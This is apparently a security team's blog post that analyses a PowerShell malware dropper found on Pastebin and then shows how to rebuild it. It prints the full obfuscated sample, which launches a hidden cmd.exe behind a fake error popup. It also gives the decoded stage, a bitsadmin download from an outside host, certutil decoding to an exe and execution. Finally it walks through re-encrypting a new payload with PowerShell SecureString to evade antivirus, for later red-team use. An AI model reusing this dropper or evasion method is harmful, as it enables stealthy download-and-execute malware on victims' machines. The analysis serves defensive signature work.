Malware Samples to Powershell Payloads

Introduction

Being part of both Red and Blue Teams we are always on the lookout for interesting Proof-of-Concepts leaked through various places such as Pastebin, Gist, Paste.ee etc. Not only do interesting samples provide a means of self education, they serve as a possible attack templates for Red Teams in the near future… and also for analysis and signature creation within the Blue Team. We do like to throw known samples back at Blue Teams 3–6 months later to check their up-to-date with their signatures, and prove their not sitting around watching Netflix all day (Joking!)

The Sample

Today I came across this particularly interesting sample https://pastebin.com/6ftvGJF4

$key = (5,3,71,2,22,67,31,121,5,5,14,17,21,82,19,13,1,34,1,7,6,1,15,13) 
$Secure =”76492d1116743f0423413b16050a5345MgB8AHQAYwBiAEYAWgBoAFoASwB6AGUALwB5AEIAQQAvAEoANgBpAFMAUABZAHcAPQA9AHwAOQA2AGIANAA0ADcAZgA4ADEAYwA0AGYAYQA3AGYAOAA2AGEAMgA0AGUAZAAxAGYAMwAyAGEANQBjAGUANQAyADUANwBhAGYAZgBiADUANQAyAGUAMAA1ADQAOAAyADMAZQAwAGYAYwA0ADQANwBiADQAYQAwAGMAZQAwAGUAZABhADYANgBkADAAOAA4AGQAZgA4AGYAYwBlAGUAZQAxADcAMgA2ADIAMABmADMANgBlADUAMQAzAGIAZgBjAGYANwBhAGEAMgA1ADUAYwAzADIANgBiADUAZgBjAGEAZgA1AGEAZgAxADQANABlADQAZQBlAGYAOQA5ADMAZQA1ADMAZABiAGIANQAzADgANQA0ADAAMwBmAGMAOQA1ADAANQBmADAAZAAzADAAYQA0ADYAYgBjAGQANgA5ADIAMABiADYAMQAzADYAYgAzAGMANQA2ADYAMQBlAGUANwAwAGEAOQA0ADUAMQBlAGUAMAA5AGQANQBkADYANAAzAGQAOAA4ADIAZQA4ADAAZQAzADkANgBhADEAMAA2AGQAYQA4ADMAYwA1ADUANgBkADEAMwAxADEAZAA3ADEAMgA3ADIAYQBlADIAYgAxAGQAZABmADkAMAA4ADYAYQA1ADQANQA3ADQAMQBjAGUAMgBhADYAZgA4ADEANABjADQANAAwAGEAMABhAGQANQBkADYAZAA3ADMANgAzADAAZgBmADUANgBjAGEAMAA1ADEAMwBiADQAZQBmADgAZgBiADIAMAAwAGIANAA3AGUAZgAzADAAMwBiADUANAA2ADcAMgBlADMANQA4ADAANwA2ADMAZgAwADEANAA4AGEAYgAxAGQAOAA4AGIAYgA1ADEAYQA4ADgAMQBhADYAZAAzADIAZgBmAGEAMABmAGUANQBmAGEAMgAwADcAMwA1AGUAZgAzADIAYgAyADYAMABhADEAYwA1ADQAMwAzADAANAA0AGUANgA2ADYANABkADYAZgA0AGQAYQAwADUAMQA5AGMAYwBlAGEAYQA5ADAAYQA3ADMANABkAGYAZQBkADYANwBhAGQANwAwADEAMAA0ADIAYwBlADIAMQA4ADEAZgAzAGUAYwAzADIANwA0ADAAZgBjADIAOAA2ADgAMAA4AGIAZABjADUANQAzAGIAMwBiADcAYwA0AGYAMABlADUAYQBhAGMANgBjADQANwA2ADUANAAyADcAMwBkADcAOAA2AGIANQBhADcAZgBiADMAMgA5ADkAMABiAGUAMgAxAGMAMgAwADAAYgBjAGIANgBlADkANwAwADcAOAA5ADMAZAAzADUAZAAxADUAYQA2AGYAOQA2ADcANwAxADYAYgA4ADgAYQA3ADQAMwAzADUAMQBlADUAYwA2AGUAMAAwADMAYgA2ADYAMwBkADMANwBkADkAOQAwADAANQAzAGEAZQBjADEANwBlAGYAMwBmADAAZQBkAGMANAAwAGUAZQAyAGYAOQA0AGYAZgBhAGEAMwBmADYAMAA4AGEAMQAzAGYAMgAwADYAMgA2ADgANAA2ADgAOABhADIANABiAGQANAAwAGYAYgAyADMAYwA1ADYAZQA2ADMAOQAxAGYANQBiAGQAZgA2ADQAMwAzAGUAYgA2ADkAYgA1AGIAMwAwAGQAZgBmADMAZgAyAGIANwBhADUANgBlADEANQAxAGQAOQBjADQAZgBkADEANwAxAGIAMgAyAGYAMgBmAGYAMAAyADcAYwBjADYAZABlADYAZQA3AGIANAA2ADYAYQA4ADYAZQBlADYAYgA0ADMAOQAzADIAOAA2ADYAMAAxADMAZQAzADYANQAwADAANgA0ADMAYQBiAGUANABhADQAMQA2AGUAOQA4ADUAYgA0ADcAMABlAGQAYwAwAGUAMAA4ADAAOABhADEANgA1ADEAZgA5ADEAZgA2ADUAMABmAGYAMAA1ADIAYwBhADMAYwA3ADgAZQBlAGMAYgBiADkAMgAyADIAMgA5ADMANABmADAAYgA5AGQAZABjAGUAMAA3ADkAMwAyADAAYgA5ADMAYwA0ADcAOQA3ADgANgA1ADQAMQA3AGYAOQA4ADgAZgBiADkAYgA5AGMAMwA1AGYAYQBkADIAYwBlAGIAYQAyADcAYwAzADEAOQA2ADUANgA2ADYANQAyADcAZAA0ADUAZgBlADgANgBiADkAOQA3ADYAYQA0AGQANAAxADkAYgBmADUAMwA1ADIANQBlAGQAYwA4ADEAYwA3ADkAOAA0AGUAMABiADYAOAAxADMANwA4AGMAZAAwADIAYwBiADEANABkADYANwA2ADYANAAwAGYAYwA0ADQANQBmADMAMQAxADUANQA2AGQAMwA3AGEAZQBkADEAMQAxADEAZgA4ADgAYgA4ADMANQAwAGUAZgBlAGUAMAAwADkAMwBlAGMAMQBlADAAMgBhADEANABmADgAYQBmADgANAAwAGUANwA1ADgAMABjADgANgBjADEAOQA0AGUANgA4AGQANQA4AGIAYQBkADEANwBhADcAYgA5AGYAMgA2ADkAZgBiAGUAZgA5AGMAOABkAGEAMgBlAGQAMgAyADgANgBiADAANgBmAGQAYgBkAGEANwAwADAAZgBjADEANQA1ADQAMgA4ADcAYwA2AGIAZAA5ADQAZAA2AGMAYwA2ADYAYQA0ADAAYQAyADcAOQAxAGYAMQAyADcANwBiADEAMgBhAGUAMwA3AGYAZQBiAGMAMgAzAGEANQBkADcANAAwADgAOQA4ADUAMABjADcAYwBhADEAYQAyADIA” 
$Encrypted= ConvertTo-SecureString $Secure -key $key
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted)
$ldf = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) -replace “_TMP_”,$env:tmp
$dm0 = “cmd.exe”;$ldf; start-process -wiNdowStylE HiDden $dm0 $ldf;$of = nEw-obJEct -coMOBJecT wScRiPt.sheLl;$7hi = $of.popUp(“Error reading file, contents are corrupted”,0,”Error”,5);

We had not seen something particularly this interesting this year (lately its been the standard Metasploit reverse HTTP(S) payloads, Empire, Cobalt Strike, and a few Cryptominers). We thought this method was interesting as it was using the built-in Powershell cryptography in an attempt to circumvent Antivirus and other detection based technologies. So we set about tearing this sample apart, investigating how to reverse and rebuild this particular method of obfuscation.

The decoded sample

Simply running the first few lines decode the payload as the following:

/c bitsadmin /transfer notepadework /download /priority normal  https://themikecam.com/djkbd12/4gtns1q.txt $env:tmp\e1k2831.txt & Copy /Z $env:tmp\e1k2831.txt $env:tmp\yt5rehju.txt & certutil -decode $env:tmp\yt5rehju.txt $env:tmp\yt5rehju.exe & staRt $env:tmp\yt5rehju.exe

Using the following intel report from: https://urlscan.io/ip/195.123.212.206 we can see this sample has been known about, for at least the last 2 months, and by the looks of things the site has been disabled (or has an IP filter for particular targets?). We can also see the well known base64 decoding trick of converting a seemingly harmless plain text file into an executable binary. We will stop here as the site appears dead!

Reproducing a similar sample

In our search to find similar samples and PoC’s we discovered the following articles from over 4 years ago:

Reversing PowerShell ‘SecureString’ For Fun And Profit

Something that I needed to do in an engagement recently and thought it might be useful to you guys. Here’s a little… blog.devalias.net

How can I use ConvertTo-SecureString

Let’s say I need to do this in Powershell: $SecurePass = Get-Content $CredPath | ConvertTo-SecureString -Key (1..16)… stackoverflow.com So this is not something new! Anyway, lets learn how to rebuilt this sucker…

Our sample payload.txt:

/c bitsadmin /transfer notepadework /download /priority normal https://www.example.com/gogo/go.txt _TMP_\1234.txt & copy /z _TMP_\1234.txt _TMP_\5678.TXT & certutil -decode _TMP_\5678.TXT _TMP_\5678.exe & staRt _TMP_\12345.exe

Powershell commands:

[securestring] $SecurePayload = Read-Host -asSecureString
***... [copy n paste payload.txt contents] .. ***
[string] $psProtectedString = ConvertFrom-SecureString -key $key -SecureString $SecurePayload
$psProtectedString
76492d1116743f0423413b16050a5345MgB8AEwAYwArADkAegB1AG0AQgA5AEcAVgBvAHMARwAwAEgAeABVADEAbwBSAFEAPQA9AHwANwBkADcAZgAwAGEAOABkAGQAZgA2AGMAZAA0ADAANgBkAGEAZABjADEAYQA0ADkAMwA2ADMAYwBhAGYAMgBjADQAZgA0ADEANQBhADAAMAA2ADgAMQBlADIAMgBlAGMAMQA1AGYAZABjAGUAMAA1ADYAYQBmADUAMABlADIAMQBmAGIAMwBhADQAYwBkADIAZAA5AGUANgA5AGYAYgBiAGYAMQA0ADYAYwA3ADMAMwA5AGIAZgBjADAAZQBlADMANgA5ADMAOQBkADIAMQBlAGYAZQBlAGUAMwA4ADMANABmADgAZABhAGQAYgBjADYAOAAyAGUAZABkADkAMQA4ADIAMwBhADkAYgBmADgAZQBlADgAZgAyAGQAZABkADgANwBlADIAOABmAGUANQBiAGEANgA4ADAAZgAxAGMAYgAwADUAOQA0ADYAYgBjAGMAZAA4AGEAOABmAGIAMgBmAGUAMAAwAGUAYQBiADYAYgBlAGUANgBmADUAMQAzAGMAYQA1ADQAMAAyAGYAZgAzAGYAMgA4ADAAMwBhADYANgBhADEAZgA1ADMANQBkADgAZgA4ADgAYQA3ADYAYwA0ADIAZABhADIAMQA2ADEAOAA2ADYAMQBmADUAZAA1ADMAMwA3ADEAOAA0ADEAYgBkADkAYQA0AGUANQBiADkAMQBlADAAYgAyAGUANAAyADEAMgBlAGIAYQBiADcAZQA5ADAAYQAyAGYANwA4AGUAZgA5ADYAOAA0AGYAMgAzADcAOQA0ADQANwAxAGYAZgBkADEANgBhADcAZQA5AGUANwAyADIAMAAwADEAZgA5AGUANQBlADgAMgBkAGUANQAwAGYAMgAyADgAOAA2ADcAZAA3ADAAMAAyADQAMQBmADQANAAxADcAMQAwADYAYQA2ADAAZQA2ADMAZQBlADMAOQA2ADIANwBhADcANgAxADMAZgAzADcAMgBjAGUAYwBiADMANgA0ADcAMwAxADQAMwA0ADcAMQAxADgANwAyADAANgA3ADYAYwA4AGYAMAA3AGUANQAzADcAZgAwADUAMQA3ADQAYgA5AGUAYQA0ADcAZgBmADYAOQBmAGIAMAA2AGMANQBlAGIAMABhADYAYgBlAGQAYgA2AGMAZQAwADgAOQBhAGQAZQAzADkAOAA4ADkAYwA0ADcAOQA5AGQAZQAyAGIAZQA2AGIAOQA1AGIAMwBiAGMAZQAzADEANABiADQAOQA2ADkAZQA0ADIAMgA0AGIANwA4AGIAOAA5AGMANwBkAGIAMAA5AGYAMQAwAGEAMwAwADkAMABmADAAYQAwADgAOABkADMANwAyAGEAMQBmADEAZABjAGUAMQA3ADMANgAzAGUANwBmAGQAOQBmADgAZgAxADkAYQAxADYAMwA4AGUAZQBkAGUAZABhADAANwA1ADIAMAA1ADMANABiADEAZgA2ADUAYgBjAGYANwBkADcAYgBhADEANABiADkAMwAzADIAZgA2ADQANwA1ADEANgA2AGEAMQA2ADYAMgA5ADQAYgBlADEAMwAwADcAMAA0ADEAYQA2AGUAZABmAGQAZQAwADAAOQBiAGMAMgBkADQAOAAzADkAYQA1AGUAYgBlADgAMAA5ADgAZQA3ADkAOABmAGUAZQAxADMAMgBmAGEAZABhADYAZgAzAGIAOABjAGIANQBmADAANgA1AGQANQAxAGIAYQA3AGUAZAA4ADIAYQBjADQAMQA1AGEAZQAwADEAMQA0ADAAYQBkADkAZgAxADYANwA3ADcAMQAzAGUANwA2ADUAYgAyAGIANgBlAGQAOABkADgANgAwADAANAA3ADgAOQA0ADAAZgA5ADAANwBkADAAYQAxAGYAOQAyADMAMgAwAGMAYgA3ADQAYQA3ADIAYQA2ADUAZAAwADEAZABkADEANgAzADUANABiADMAYwA5ADAANwAxADgAYQA4ADUAMwA4AGMAOABmADMAMwAyADkAZABjADgAYQAzAGEAYwAyAGYAOAA0AGMAOAA5ADUAMwBhAGQAYwA5ADMAZQBmAGQAZQA1ADEANAA5ADIAZQBmADQANgBhADEAMgAzAGQAMABiAGYAMABkADIAOAAyADcAYQBiADgANwA1ADgAZgAzADEAMAAxAGIAMQBmAGMAOAA2ADIAMQA2ADQAYQAwAGEAYQA1ADAANgBmAGMAMwA0ADUAYQA0ADQAZgAwADIAOQBhAGQAMgBmADcAMgAwAGYANAAyAGEAZAA5AGQANABjADUAOQA0ADQAOQA1ADkAYgAxAGEAYgAwADAANwAyADQAMQA4AGMAOAA3AGMAMwBmADcAOQBkADYANwBkADQAOABhAGMAMwAwAGQAMABlADAAYgBjAGQAOQA0ADgAOQAwADYAMgBhADkAMgBiADYANAAwAGMAOAAwAGYAOABmADAAZAAwADUAMQA2ADUANAA2AGMAZQA=

We are then free to change the $Secure variable from the original sample top of the page (as we used the same key), with the contents of $psProtectedString.

PS. For our Blue Team associates we will change some more variables and the $key when we assess you in the next round of testing :)

---

Share on: